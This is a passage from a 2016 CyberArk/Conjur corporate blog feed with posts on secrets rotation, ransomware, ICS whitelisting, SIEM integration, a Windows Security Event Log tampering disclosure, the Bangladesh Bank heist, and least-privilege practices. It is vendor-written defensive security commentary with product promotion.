     id: secret_access_key
     annotations:
       rotation/rotator: aws/secret_key
       rotation/ttl: P1D # 1 day

Future releases of Conjur will include rotators for more targets.

Read more about rotation on our developer site.

 

LDAP Sync in the Conjur UI

LDAP Sync imports corporate Active Directory or POSIX LDAP structure into the Conjur environment. When users are added to or removed from AD/LDAP, these changes are reflected automatically in Conjur. AD/LDAP serves as the system of record for users and group, while Conjur is the master source of machine identity, privileges and secrets.

LDAP Sync in Conjur UI

LDAP Sync can now be configured and triggered in the Conjur UI. A connection to an existing LDAP/AD system can be established and saved in the Conjur UI for later use. Users and groups can be filtered so that only the entities you want are synced to Conjur. Additionally, public keys can be synced as well. This makes it easy to start governing SSH access with Conjur.

Read more about LDAP Sync on our developer site.

 

Forwarding audit events to external systems like Splunk and ELK

Conjur’s audit log contains events detailing everything that happens in the Conjur environment. The Conjur audit log tells a complete audit and compliance story. Shipping audit events to a centralized logging platform (Splunk, ELK, etc) is a new capability in Conjur v4.7.0. This allows you to use your existing log management systems to inspect, and alert on, events happening in Conjur.

Conjur audit event in Splunk

Conjur 4.7 exposes a logrotated JSON file `audit.messages` that can be forwarded to any log aggregation platform. Since the logs are JSON, fields are parsed on ingestion and easily searchable. Alerts and notifications can then be triggered on events in Conjur. For example, an alert can be sent to your InfoSec team if a user is repeatedly denied `sudo` access on a host. A second example: a notification can be sent to a Slack room on policy updates, increasing the visibility into how your organization’s security policy changes over time.

Read more about audit forwarding on our developer site.
Also, see our Splunk integration page for an illustrated example.


See the release notes for Conjur 4.7 for a full list of all changes in this new release.

Contact us for release access and upgrade instructions, or if you have any questions. We hope you enjoy this new release of Conjur!

 

]]>
Conjur Automates Secrets Rotation at Web-Scale https://www.cyberark.com/blog/conjur-automates-secrets-rotation-at-web-scale/ Wed, 08 Jun 2016 17:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-automates-secrets-rotation-at-web-scale/  

Press Release:

New privileged access management functionality takes the risk and guesswork out of compliance

WALTHAM, Mass. – June 8, 2016 – Conjur, Inc., the digital business security software provider, today announced the availability of Secrets Rotation, Automation and Monitoring, providing clients with fully automated secrets management.

“Secrets” are credentials such as passwords and API keys that provide privileged access to IT systems. Secrets need to be changed, or “rotated” periodically, sometimes daily, in order to help prevent unauthorized access to systems.

Incorporated into the Conjur privileged access management software, Secrets Rotation, Automation and Monitoring offloads the secrets management burden from DevOps and software developers, and provides companies with a clear view into compliance with secrets rotation policies. Clients can simply log in to their Conjur dashboard to view the rotations and schedule and rotate on demand.

“Secrets management is a security best practice that absolutely requires automation given the scale and complexity of today’s digital business systems,” said Elizabeth Lawler, CEO of Conjur. “Without clear insights into when secrets are rotating, and confirmation that rotations have occurred without failure, it’s virtually impossible to confirm that you’re compliant – and that your information is safe.”

Secrets management is a critical aspect of security, but current solutions lack clear visibility into rotation history. Conjur alerts to rotation failures, and the intuitive user interface design makes it simple for clients to produce an audit trail to demonstrate compliance.

Secrets rotation is an element of security best practices, but managing it can be expensive when you’re talking about digital business systems composed of thousands of interconnected cloud instances, microservices, databases, and other system entities. With policy-driven automation of secrets rotation, a simple dashboard and clear insights into secrets management, Conjur is taking the risk and guesswork out of compliance, allowing clients to focus on delivering the best user experience to customers, rather than system administration and worrying about digging through data to produce proof of compliance.

Secrets Rotation, Automation and Monitoring is currently available to Conjur clients and integrates to secure a wide variety of legacy and cloud resources.

About Conjur

Conjur is privileged access management and security software for digital businesses, who need to secure access to the thousands of system resources that compose modern applications.  For enterprises that need to protect their infrastructure and ensure audit compliance and traceability, Conjur is the only solution with comprehensive identity and authorization for every cloud, VM, container, service, job and user. Conjur helps companies such as Netflix, Box, and Cisco solve critical operational, compliance, and security challenges that originate in modern automated infrastructure. Headquartered in Waltham, Massachusetts, Conjur is funded by Avalon Partners and Amplify Partners. Visit www.conjur.net  and follow @conjurinc on Twitter.

PRContact:
Andy Ellicott
Conjur, Inc.
+1-603 205 2804

andy@conjur.net

All trademarks recognized.

 

]]>
Combatting the Threat of Enterprise Ransomware https://www.cyberark.com/blog/combatting-the-threat-of-enterprise-ransomware/ Tue, 07 Jun 2016 09:21:37 +0000 https://www.cyberark.com/blog//

Ransomware has been around for decades, but it’s quickly gaining popularity among attackers. In 2015, the FBI received 2,453 complaints about ransomware, costing victims more than $24 million dollars – and those are only the cases that were reported. Those numbers have the potential to rise significantly in 2016.

CISOs and other senior IT security executives are under pressure to combat the threat of ransomware, not only because of the fear of becoming another headline, but also because ransomware has demonstrated the ability to take control over a business.

Ransomware is particularly daunting for a few reasons:

  • Administrator rights are not always required. So, while privilege management can play a role in mitigating risks, many strains of ransomware can encrypt data using standard user rights, so even if an organization has removed local administrator rights, this doesn’t necessarily mitigate the risk.
  • There is immediate impact to business productivity. Ransomware has a devastating and immediate impact because it can encrypt (and render unreadable) all files that a user has access to in a corporate environment.

There are a number of techniques organizations can use to mitigate the risk of ransomware attacks including regular backups, anti-malware, privilege management and application control/whitelisting. At CyberArk, we have helped many organizations employ a combination of application control and least privilege enforcement to protect against advanced malware attacks. These capabilities are designed and proven to protect organizations from ransomware attacks, a specific form of malware.

To provide the efficacy of the solution, the CyberArk Labs team has manually tested 450 specific ransomware samples from 14 different crypto families (including Cryptolocker, Petya, and Locky) – focusing on the most common and notorious ransomware strings. CyberArk Viewfinity is able to block 100% of the ransomware samples from successfully encrypting files.

Most anti-malware and anti-ransomware solutions today focus on detecting and blocking malware at the point of inception. These solutions can be helpful when you know what you’re looking for – but when it comes to ransomware, there are new variants coming out every day. It’s challenging to stay ahead of the attackers and block all variations of ransomware from entering a network.

CyberArk Viewfinity takes another approach – protecting the sensitive files in an organization from the damage that often results from ransomware attacks.  Employing greylisting, an approach that allows unknown applications (e.g. the latest ransomware variant) to execute, the solution blocks ransomware from being able to access or encrypt files. By applying proactive protection on the actual files that ransomware is attempting to encrypt, this approach can render ransomware incapable of causing damage.

The CyberArk Viewfinity approach is signature-less and protects against known and unknown variants of ransomware. By applying a protective layer of security around the target of malicious applications, the challenging task of detecting polymorphic malware is no longer the only strategy.

For an explanation of how ransomware works, check out a previous blog post that examines a recent attack targeting three Indian banks and a pharmaceutical company, resulting in millions of dollars in damage.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

]]>
Mitigate Cyber Threats in Industrial Control Systems with Application Whitelisting https://www.cyberark.com/blog/mitigate-cyber-threats-in-industrial-control-systems-with-application-whitelisting/ Tue, 07 Jun 2016 09:02:48 +0000 https://www.cyberark.com/blog//

The number of security incidents reported by organizations that operate Industrial Control Systems (ICS) has increased in recent years. Some of these incidents have impacted the operation of critical infrastructure. In a recent survey about cybersecurity and critical infrastructure, respondents indicated that 76% of attacks have grown in sophistication compared to previous years.

The use of malware (Dragonfly, Black Energy, Irongate etc.) to infiltrate organizations and compromise assets in ICS is a driving force in the increasing number of attacks. To mitigate the spread of malware, there are many security practices that industrial organizations should consider. One example is application whitelisting. This practice has been recommended by industry organizations, ICS security experts and government agencies to help mitigate the spread of malware into ICS environments. Application whitelisting enables organizations to:

  • Lock down specific ICS nodes allowing only approved files to run
  • Mitigate/contain the spread of malware to industrial control system assets
  • Enable users to seamlessly run whitelisted applications in critical systems

Another factor contributing to the increasing number of attacks is the interconnection between IT systems and the OT environment. The level of risk is increasing because ICS is now exposed to the Internet. The stakes are high for industrial organizations because a security breach can go well beyond data exfiltration. A security incident could disrupt operations and cause damage to personnel, property and the environment.

Organizations seek new ways to effectively and efficiently operate their industrial control systems in order to lower costs and mitigate potential security risks. Here are some practices to keep in mind when sourcing application whitelisting solutions for ICS:

  • Collaborate with solution providers and ICS vendors to baseline and calibrate application whitelisting solutions to mitigate technology interoperability issues and deploy the most reliable solution possible.
  • Consider a solution provider with a strong support organization and training program. This can help industrial organizations to mitigate a talent gap by helping them transfer and strengthen knowledge of ICS operations and security.
  • Investigate the ability to adopt a whitelisting “solution as a service”. This approach could help organizations to acquire the technology and expertise to support the cyber security requirements without forcing the undertaking of this project internally.

The infographic below illustrates the increase in frequency and sophistication of attacks, the connection to privileged accounts as a common denominator and important mitigation steps to help industrial organizations in the path to increase their security posture.

Read more about CyberArk’s new cyber security capabilities for Industrial Control Systems.

Cyber threats to ICS_FINAL 060216

]]>
The Value of CISO Peer-to-Peer Guidance https://www.cyberark.com/blog/value-ciso-peer-peer-guidance/ Wed, 01 Jun 2016 13:28:05 +0000 https://www.cyberark.com/blog//

Today, enterprise organizations worldwide face a growing range of cyber security threats. From speaking with a number of leading CISOs, we know many view their peers as valuable and important resources in the fight against cyber attacks because they have challenges and adversaries in common.

In a CIO article , Jim Motes, contributor to our CISO View research report, advocates for stronger collaboration among information security leaders to help stem the current cyber security talent shortage while better protecting corporate networks. Many CISOs we speak to believe that sharing experience, observations, predictions and solutions with peers is absolutely critical. This is often easier said than done in a world of overbooked schedules.

This is why CISOs have responded positively to the report, “The Balancing Act: The CISO View on Improving Privileged Access Controls,” commenting the report is like “getting a bunch of ace CISOs together and picking their brains – all without ever leaving the office.”

The research addresses the elements that facilitate security initiatives – details based on hard-won experiences of security professionals. Your organization is not alone in its challenges, even the best managed organizations have a range of issues to address including cultural resistance to change. This group of change-agent CISOs has made things happen even when the realities of legacy systems, processes and personalities were messy. By learning from their experiences, you can too.

I’ve been impressed by how candid the contributing team of CISOs have been. It’s my hope that their pragmatic, real-world stories will help you plan and hone your security programs. I encourage you to download and read the full report. But in the meantime, here is more food for thought:

  • Improving privileged access controls is a balancing act between restricting and enabling access. There are options available for an effective strategy.
  • A team with the right blend of hard and soft skills is a key ingredient in improving privileged access controls. Influencing and educating people is a critical job, and to do that, the security team needs to rely on members who are good with both technology and with people.
  • Metrics are essential for evaluating the need for improvements, and then later, measuring the effectiveness of controls and the impact on the business. The report provides specific recommendations on what metrics to gather and how to best use them.

We are proud to support the CISO View initiative and are grateful to the group of CISOs who made this initiative possible. By sharing their insights, the members of the panel are helping the larger community improve privileged access controls.

]]>
Privileged Account Security: The Foundation of an Enterprise Security Strategy https://www.cyberark.com/blog/privileged-account-security-foundation-enterprise-security-strategy/ Fri, 27 May 2016 17:44:11 +0000 https://www.cyberark.com/blog//

The most recent Verizon DBIR confirmed, yet again, that privileged account security is an essential part of an organization’s defense – protecting networks and data from cyber attacks and cyber criminals.

Over 100,000 security incidents and 2,260 confirmed breaches were analyzed to compile this year’s Data Breach Investigations Report (DBIR), which for the first time includes a separate section on credentials – a telltale sign on the increasing importance of Privileged Account Security.

According to the DBIR, approximately 80% of data breaches are executed by external actors and the predominant reason for the attacks is financial gain. One of the most notable findings is that the time it takes to compromise a network takes less than an hour in 93% of cases.

 “As previously alluded to, these cases begin with a phish, featuring an attachment whose mission in its malware life is to steal credentials. If you have legit creds, it doesn’t take a very long time to unlock the door, walk in and help yourself to what’s in the fridge.”

Once in, credentials represent the top data variety that attackers seek. This is mostly due to the large amount of opportunistic banking Trojans and the desire to acquire intellectual property.

 Within the credentials section, Verizon reports that 63% of confirmed data breaches involved weak, default or stolen passwords. Observing incident classification patterns – recurring combinations of who (Actors), what (assets), how (actions) and why (motive) among other incident characteristics, privilege misuse was the second most common reason for a credential attack.

Even more alarming, in Point of Sale attacks, “Ninety-seven percent of breaches featuring use of stolen credentials also had a vector of Partner. This is selected when the Actor uses legitimate partner access in the hacking action.”

In incidents of cyber espionage, the second most prevalent threat action is the use of malware. Specifically, malicious software was involved in 90% of cyber-espionage incidents. The report goes on to mention that whether it’s delivered via email, a web drive-by, or direct/remote installation, protecting the endpoint is critical to thwart malware attacks.

Achieving Privileged Account Security

In a recent presentation, Rob Joyce, Chief of the Tailor Access Operations of the NSA, remarked that privileged credentials of network administrators and other privileged users are sought after by persistent threat actors as a means for gaining access to critical systems. Privileged credentials are in fact, absolutely critical for this purpose and ultimately, to reach the heart of the enterprise.

As recommended by Mr. Joyce, privileged account security must be a strategic priority for an organization. It’s imperative for organizations to understand what normal privileged user behavior is and what isn’t. Effective protection requires implementing a robust and dynamic password policy that includes enforcing a policy of “least privilege” to ensure users have only enough privileges required to do their job. Finally, the increase in phishing attacks beckons the need for organizations to increase cyber security awareness to mitigate this type of attack.

Here are some important practices to keep in mind around privileged account security:

  • Understand what your privileged users do across your network; their credentials are a target that must be secured.
  • Implement least privilege and application whitelisting as a means to stop malware from spreading.
  • Do not lose sight of applications which may have hard-coded credentials built into scripts. These could expose hashes that compromise your most critical assets, such as domain controllers.
  • Understand anomalous behavior and how to stop it before it takes over your networks.

The importance for organizations to proactively secure privileged accounts is no secret. Privileged Account Security is not only essential in defending networks and data from cyber attacks and cyber criminals but also in building an effective and proactive cyber security posture that can standup to the most aggressive of attacks.

]]>
Integrate CyberArk with a SIEM Solution, Gain Valuable Insights About Advanced Threats https://www.cyberark.com/blog/integrate-cyberark-siem-solution-gain-valuable-insights-advanced-threats/ Tue, 24 May 2016 08:58:04 +0000 https://www.cyberark.com/blog//

Reviewing recent breaches, we consistently see the same attack patterns. Simply put, attackers crash through the perimeter, compromise a credential and then use the acquired access to move laterally throughout the network. They escalate privileges until they complete their goal. Whether the mission is to steal data, disrupt operations or destroy infrastructure, attackers tenaciously pursue their goals, using a wide variety of tools and tactics.

Ideally, organizations will break the attack lifecycle early in the cycle. In April 2016, CyberArk launched the C3 Alliance – CyberArk’s global technology partner program, to help organizations better address security challenges and to stop the most advanced cyber threats – those involving privileged accounts. By incorporating CyberArk’s privileged account security best practices, as well as leveraging CyberArk privileged account data within a rich partner ecosystem, mutual customers can maximize their existing security and IT investments to enhance their overall security posture.

For example, CyberArk integrates with leading SIEM solutions to leverage CyberArk privileged account activity data and to deliver more valuable insights about advanced threats to customers. Privileged activity alerts from CyberArk Privileged Threat Analytics are sent to the SIEM solutions, and the alerts can then be correlated with other real-time data collected from the organization, so that the most critical security threats can be identified. With these integrated solutions in place, organizations can leverage enhanced detection capabilities to break the attack lifecycle as early as possible.

Here are two scenarios to demonstrate the advantages of the integrated solutions:

  • An Unmanaged Privileged Account – CyberArk Privileged Threat Analytics integrated with a SIEM solution can detect a privileged account (user or application) that is used in the environment, and flag it if it is not managed in the vault.

By correlating login activity made by privileged accounts received from the SIEM solution with CyberArk Digital Vault data, CyberArk Privileged Threat Analytics verifies if the account is managed by the CyberArk Solution and if not, sends the alert to the SIEM solution. These unmanaged accounts may pose a risk to the customer, as they can be accessed in an uncontrolled way. As a best practice, all privileged accounts should be managed in the CyberArk Solution, especially active accounts in use.

  • Suspected Credential Theft – An attacker compromises a machine and steals privileged credentials using hash harvesting to execute a Pass-the-Hash attack. Once obtaining privileged access, s/he tries to access a different sensitive machine. The SIEM solution, in this case, sends all login activities to CyberArk Privileged Threat Analytics. CyberArk Privileged Threat Analytics correlates the logs from both resources, trying to find a match between a login to an endpoint and a prior password retrieval from the CyberArk Solution. When CyberArk Privileged Threat Analytics detects that a user is connected to a machine with a privileged account without first retrieving the credential from the CyberArk Digital Vault, the solution can prompt an immediate credential rotation and send an alert to the SIEM that there is a suspected credential theft.

Keep in mind, attackers will act inside a network undetected for an average of 146 days. If an organization is able to detect privileged misuse quickly, the time exposed can be significantly reduced, resulting in a corresponding reduction in damage to the business.

To learn more about how CyberArk works with leading SIEM vendors, click here or watch a short video of one of our C3 Alliance members talking about market trends and the advantages of technology integration with Cyberark.

Join us on Tuesday, May 24, 2016 for a webinar with FireEye. The webinar will focus on how attackers find their way into the heart of enterprises, the role privileged credentials (passwords and SSH keys) play in an active cyber attack, and how the integration of the CyberArk Privileged Account Security Solution and the FireEye Threat Analytics Platform (TAP)  can help organizations detect, alert and rapidly respond to cyber attacks.

C³ Alliance: AccelOps & CyberArk

 

C³ Alliance: FireEye & CyberArk

 

C³ Alliance: LogRhythm & CyberArk

 

C³ Alliance: RSA, The Security Division of EMC & CyberArk

 
]]>
CyberArk Labs: Can Incident Response and Audit Teams Always Trust Windows Security Event Logs? https://www.cyberark.com/blog/cyberark-labs-can-incident-response-audit-teams-always-trust-windows-security-event-logs/ Thu, 19 May 2016 19:53:58 +0000 https://www.cyberark.com/blog//

Introduction

CyberArk Labs recently identified what it believes to be a significant risk in the Microsoft Windows 10 Security Event log.

Once reserved for IT administrators to troubleshoot system problems, Windows Event log has evolved as an important component of enterprise security operations for conducting Windows audits and threat detection. According to Microsoft, the Event Viewer provides detailed information about system events including information such as the event type, the date and time that the event occurred, the source of the event, the category for the event, the Event ID, the user who was logged on when the event occurred, and the computer on which the event occurred.

Automated solutions and security experts collect and analyze these Event Logs to identify security-related risks such as OS changes made using privileged administrator account credentials. Security experts have become conditioned to fully trust the reliability of this log data, and due to the perceived high reliability of the Windows Event Log, it may serve as evidence in court. But what if an attacker gains control over an endpoint, compromises privileged accounts, and manipulates these records?

This blog will explore a serious condition that risks enabling an attacker to manipulate log data, address the impact on the veracity of Event Logs and security protocols, and offer advice to organizations to help mitigate risk.

Description of Risk

Our research discovered security risks relating to Windows Security Event Logs used to support Windows Audit processes. Attackers may be able to bypass security measures and alter Event Logs that automated algorithms and security experts rely on to mitigate the damage of an attack. By circumventing Microsoft security audits and falsifying Event Logs, attackers would be able cover their tracks, exploit privileged credentials without detection, freely move about the network and exfiltrate data or cause other damage to the infrastructure.

Automated services and security experts trust the information in Event Logs for several reasons, including that Log files are only accessible by the Event Log service, and the Security Event Log is only writable by the Local Security Authority Subsystem Service (LSASS) process. LSASS is a process in the Microsoft Windows operating system that enforces security policy by verifying users logging on to a Windows computer or server, manages password changes, and creates access tokens.

In Windows 10, new capabilities were added to LSASS to help identify attacks that steal credentials from the memory of a process. New Microsoft audit features not only track unwanted access to LSASS, but also privileged credential escalation and credential theft.

After reviewing new audit features, CyberArk Labs initiated research that found several risks associated with Windows Event Log, including:

  • Security audit files are not encrypted on the machine
  • These files are editable by attackers through multiple techniques
  • These files can be modified if an attacker has the required skills
  • Once modified, these files can be opened by Windows Event Viewer without any indication of compromise. Event Viewer is a tool that displays detailed information about significant events on your computer (for example, programs that don’t start as expected or updates that are downloaded automatically).

 Exploitation

It is generally known that the security log (Security.evtx) file is only writeable by the LSASS process. According to Microsoft, “only the Local Security Authority (Lsass.exe) has write permission for the Security log. No other account can request this privilege.”

Our research team set out to investigate whether the data inside Windows Security Log could be manipulated. Our research is ongoing, but we decided it was important for security vendors and incident response teams to understand what we’ve learned so far.

During our research, the team has been able to accomplish several tasks that should raise concerns among customers. These tasks include the ability to stop the writing to the Security Event Log, alter records, replace the existing log, and resume the event log – all without being detected.

Our research proved that once the administrator privileges on the machine had been compromised, there are a number of ways to retrieve and edit the data, and then inject the modified data back into the log without detection. Specifically, the following screen shots illustrate the change of a single record in the security audit file, whose purpose it is to alert on access to the LSASS process. The actual event was triggered using Mimikatz.

After altering this field we can see that there are no traces to the actual incident (those trained on where to look will notice that no “Log Clear” record exists).

ms blog figure 1

Figure 1 – Pre modification

Which is followed by:

 

Figure 2 - Post modification (002)

 

Figure 2 – Post modification

As you can see, the event record that initially indicated Mimikatz performed a “read memory” action from LSASS now shows there is no threat to the enterprise.

Mitigation

There are a few mitigation techniques that organizations should consider. The first would be to ensure that audit records are immediately sent to their SIEM (log management) system. If a trusted copy of the audit record can be stored outside of the Microsoft audit log, any unauthorized changes to the log file will not impact the operation of their analytics system or centralized audit records.

However, our experience has shown that many organizations do not have a SIEM, may not collect logs from all of their systems or do not upload log entries in real-time, so this mitigation option may be of limited use.  And of course, this step will have no mitigation value if an attacker disables the audit logging process for a period of time.

This attack can be avoided to begin with by adopting the least privilege principle – specifically denying administrative rights from endpoint users. Though the altering of data does not require administrative rights, the procedure enabling an attacker to actually replace the data inside the security event log does.

Additional mitigation techniques include monitoring access to these sensitive files; monitoring administrative actions in real-time and monitoring access to sensitive processes like the event log service.

Specifying further mitigation techniques is currently in process as research into this risk continues.

Disclosure Timeline

  • April 12, 2016: Initial discovery by CyberArk Labs
  • April 28, 2016: Risk reported to Microsoft Security Response Center
  • April 28, 2016: Microsoft responded that they did not consider the submission a valid vulnerability due to the fact that a user would need to have administrator privileges on the machine to execute the attack.*
  • May 19, 2016: Public disclosure

 *According to Microsoft’s “Ten Immutable Laws of Security” if administrator privileges are required, then the system is already compromised.

 

]]>
Lessons Learned from the Bangladesh Bank Heist https://www.cyberark.com/blog/lessons-learned-bangladesh-bank-heist/ Wed, 18 May 2016 13:14:42 +0000 https://www.cyberark.com/blog//

Most have been following the story about the Bangladesh Bank Heist. If you haven’t, here is the scoop and timeline. On May 15, 2015, three bank accounts were opened at the Rizal Commercial Banking Corporation (RCBC). Each of these accounts would lay dormant until Feb 4, 2016. Only later did authorities discover these accounts were all fake. It turns out cyber criminals who attempted to steal nearly $1 billion from the Bangladesh Central Bank had been planning the heist for nearly a year. Thanks in large part to a spelling error, however, the attackers made off with “only” $81 million of the total attempted amount.

100% of advanced cyber attacks exploit privileged accounts, and that’s true for this bank heist. Let’s take a look at the role of privileged accounts in this breach. After breaking through the perimeter, the attackers were able to successfully capture local administrative credentials from infected machines. Using the stolen privileged credentials, the attackers continued to escalate privileges and move laterally throughout the environment until they ultimately reached the SWIFT-connected systems.

The attackers used local admin rights to install monitoring software on the SWIFT-connected systems. This enabled them to gain persistent access to the systems, learn how the secure message platform worked and gain access to the SWIFT-issued digital certificates required to authenticate to the SWIFT network. With this access, the attackers used the stolen SWIFT credentials to send financial messages, thus initiating 35 fraudulent transactions. To stay hidden, the attackers used their admin privileges to remotely execute a specific advanced malware that was developed to hide tracks when attacking SWIFT systems. One of the malware’s actions disabled the printer that was configured to automatically print all sent and received messages in order to prevent employees from discovering the fraudulent transactions.

There have been a number of industry reports highlighting the dangers of not locking down privileged accounts. Following are some best practices that could have mitigated the breach:

  1. Standard business users should never have full local admin rights. Solutions, such as CyberArk Endpoint Privilege Manager, enable organizations to remove local admin rights while enabling users to elevate privileges when needed for approved tasks. Without local admin rights, it would have been difficult for the attackers to break in, move throughout the network and install malware.
  2. Secure privileged account credentials. This includes the credentials for the remaining local admin accounts on endpoints, domain admin credentials, privileged SSH keys and any other credentials that provide access to a sensitive account or system. This also could have included the SWIFT user credentials needed to access the digital certificates. By centrally securing privileged credentials, controlling access to these credentials based on role, and enforcing multi-factor authentication before granting access, the attackers would likely not have been able to get the credentials needed to laterally move through the environment, reach the SWIFT-connected systems or execute the fraudulent transactions. Even if attackers were able to harvest the credentials using keylogging malware or by stealing the hash, proactive credential rotation would invalidate the compromised credentials, making them useless to the attacker.
  3. Segment off highly sensitive systems from the rest of the IT network. This is often seen in retailers who have separate PCI environments, in utilities who separate and airgap their ICS systems, and it should be seen in central banks in their SWIFT-connected environments. For administration purposes, once these systems are separated from the standard IT network, remote access should only be permitted via a designated, secure and hardened jump server. Using this approach, organizations can tightly control access to these system, better protect against credential harvesting techniques and prevent malware from jumping from user endpoints to sensitive systems. This separation also adds a valuable monitoring component, in that all administrative access to SWIFT-connected systems can be recorded.
  4. Monitor and analyze all privilege account activity. Privileged accounts protect the most sensitive data and assets, and as a last line of defense, security teams need to be able to quickly identify anomalous activity that could indicate an attack is in-process. In this case, had the Bangladesh Bank been monitoring SWIFT account activity, they could have been alerted to the abnormal login patterns, investigated what was going on, and stopped the attackers before they were able to execute 35 transactions.
  5. Lastly, by controlling applications on endpoints and servers, organizations can apply application whitelisting policies that meet their risk tolerance. By doing this, organizations can proactively prevent unknown and malicious software from infiltrating the environment and detect when new applications enter and spread throughout the environment. In this case, Bangladesh Bank could have recognized the malware during the earlier stages of the attack. For example, SysMon (the monitoring software) and the Evtdiag.exe (the malware that hides malicious tracks) could be blocked from running on the SWIFT-connected machines.

While this attack had a serious outcome and required advanced planning, the attack methods used were not very sophisticated. With the proper tools and policies, this likely could have been prevented. For example, CyberArk’s proactive privileged account controls could have helped make it far more difficult for the attackers to get into the SWIFT environment to begin with, and advanced detection capabilities likely would detected the anomalous login activity and alerted the security team that something was wrong.

 

]]>
Video: The Cyber Attack Lifecycle https://www.cyberark.com/blog/video-the-cyber-attack-lifecycle/ Thu, 12 May 2016 11:19:31 +0000 https://www.cyberark.com/blog//

A recently published Ponemon study revealed that 63 percent of organizations have experienced an advanced attack within the last 12 months. Industry reports note an average time of 146 to 170 days to detect an attack, 39 days to contain it and 43 days to remediate. Time seems to be on the side of an attacker.
Motivated attackers will find a way to break through the network perimeter – but how are they able to prolong their undetected presence once inside? CyberArk has a dedicated team that studies and analyzes attacks that occur in the wild. Based on ongoing research and findings, we’ve learned that in most attack scenarios, there is a clear attack path that cyber criminals follow to help hide their tracks. Privileged accounts are at the center of this path.

In a short, three-minute video, our Senior Product Marketing Manager Jessica Stanford outlines each key phase of this attack lifecycle:

 

How common is this? In a highly publicized, first-ever talk by the head of the NSA’s Tailored Access Operations – the US government’s top hacking team responsible for breaking into the systems of foreign adversaries – Rob Joyce detailed each phase of a typical attack. When talking about the “reconnaissance phase,” a theme immediately emerged: the privileged credentials of network administrators and others with high levels of network access are critical for gaining access to key systems, and ultimately, the heart of the enterprise. He stressed the importance of establishing processes and procedures to closely monitor what is going on inside the network – making sure to understand what is normal and what isn’t. For example, are authorized users going to normal places within the network and operating under the norms of those particular credentials? Are they accessing new or different things that they shouldn’t be?

Joyce also revealed that his team “loves” to find admin or other credentials hardcoded into scripts or devices, as they provide covert pathways for attackers to move laterally throughout a network. He specifically noted Pass-the-Hash attacks, commenting with the right credentials, attackers “can pivot like mad throughout the network.” He warned that even temporary “cracks” – small vulnerabilities that only exist for a few hours – are exactly what advanced attackers seek. Even the smallest “crack” of one stolen credential can be enough to take down an entire organization if proper security measures are not in place. If that’s the case, think of the irreversible damage that can be done in 146+ days!

With privilege clearly at the heart of the cyber attack lifecycle, we encourage you to learn more about how CyberArk solutions can help your organization break the chain with privileged account security and detect attacks sooner. You can learn more here.

]]>
Conjur heads to Puppet Camp New York https://www.cyberark.com/blog/conjur-heads-to-puppet-camp-new-york/ Thu, 12 May 2016 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-heads-to-puppet-camp-new-york/  

Puppet-Logo-Amber-Black-sm.jpgPuppet Camp New York is May 17th, and we had such a great time at Puppet Camp Dallas last month that we could’t resist. Our VP Josh Bregman is returning to the camp stage to spread the word about “The 5 Stages of Secrets Management Grief [And How To Prevail].” Josh will speak through the five emotional phases you go through when grappling with sensitive data in your organization, and highlight tools to help you minimize secrets management risk while maintaining your Puppet workflows.

Puppet Camps are one-day events packed with great speakers. You can discover different ways Puppet can be used, and connect with other Puppet practitioners in your area. Interested in learning more about what to expect at Puppet Camp? Check out our interview with Puppet Labs’ Grace Stiller where we talk about everything the camps have to offer.

Going to be at Puppet Camp in New York? Head over to Josh’s talk, and don’t be shy! Tweet him or email him at josh.bregman@conjur.net.

 

]]>
Do Business Users Understand the Concept of Least Privilege? https://www.cyberark.com/blog/do-business-users-understand-the-concept-of-least-privilege/ Tue, 10 May 2016 08:13:09 +0000 https://www.cyberark.com/blog//

No, they don’t. They only experience the pain of inefficiency if least privilege isn’t set up appropriately to meet authorized business needs. I know this first hand. Prior to joining CyberArk, I worked in a home office for a small company based in NYC. I quickly learned how to be self-sufficient and relatively tech savvy due to limited access to our remote IT support. Eventually, that company was acquired by a large global enterprise, and I received a new laptop with a new set of headaches.

We didn’t have admin rights to our laptops. Now that I work for a cyber security company, I understand the concept of least privilege and why this is a best practice. However, at that time, I just thought it was an example of the “formality” (bureaucracy) of a large global company. It was painful at times.

A classic example – trying to jump on a webinar only to discover I no longer had the latest version of a Java update. Ugh. At that time, I worked with a global team across multiple time zones, so I spent hours each day on conference calls and participating in WebEx meetings. Taking time to contact the IT Help Desk for something I could have done quickly on my own (e.g. update Java, connect to home office printer) if I had admin rights on my laptop was the last thing I had time to do. Consider the following process to submit an IT ticket even for something “simple”:

  1. First you have to write the ticket. I included screen shots as needed. (That takes a few minutes.)
  2. Then you receive at least one automated response to confirm receipt of the request, and another email once it was assigned to someone for follow up. (Clogs up email inbox.)
  3. Then IT gets in touch to set up a time to address the situation. May or may not be the same day, and in any case, too late for the WebEx meeting even if I called help desk. (Frustrating!)
  4. Finally, you are on the phone with the Help Desk, now you have to explain the problem again – even though it was pretty well documented in email. (Timing consuming.)
  5. Next it takes a few minutes for IT to get remote access set up. (Timing consuming.)
  6. Finally they can poke around, which means you are not using your laptop/working.

The above steps were probably at least 30 minutes in total (elapsed over time) for even a quick request. I was grateful for IT help, but I just didn’t have time for all of the extra steps. Frankly, IT didn’t have time for this either. They were a small team supporting a global company.

Fast forward to 2015 when I learned about CyberArk Viewfinity. I immediately understood the concept of least privilege and application control. Love the concept of white listing, grey listing – and IT must love this too! End users may not get the concepts, but believe me they will be very happy to have access to the applications they need – when they need them – without contacting IT for simple updates. The IT Help Desk will be happy not to have to address mundane tasks that skew their performance metrics. They can spend time on other projects.

Furthermore, the IT security team will appreciate that with CyberArk Viewfinity in place, users are only able to elevate privileges for pre-approved tasks, and complementary application controls are in place to quickly identify and block any malicious applications that attempt to avoid defenses by operating without administrative privileges.

In a short 3 minute video, CyberArk’s Senior Product Marketing Manager Lauren Horaist offers recommendations on how to effectively manage local admin rights on endpoints. Watch it to learn how to strengthen security and reduce the attack surface without disrupting the authorized day-to-day tasks of business users.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

]]>
How to Address New MFA Requirements in Payment Card Industry Data Security Standard 3.2 https://www.cyberark.com/blog/how-to-address-new-mfa-requirements-in-payment-card-industry-data-security-standard-32/ Fri, 06 May 2016 09:26:45 +0000 https://www.cyberark.com/blog//

If you have any lingering doubt about the significant role privileged accounts play in advanced cyber attacks, consider the fact that yet another security authority updated requirements to expand the security controls prescribed for privileged accounts. Last week, the PCI Security Standards Council released version 3.2 of their Payment Card Industry Data Security Standard (PCI DSS). One of the key changes in PCI 3.2 is the additional requirement of multi-factor authentication (MFA) for administrators accessing the cardholder data environment (CDE).

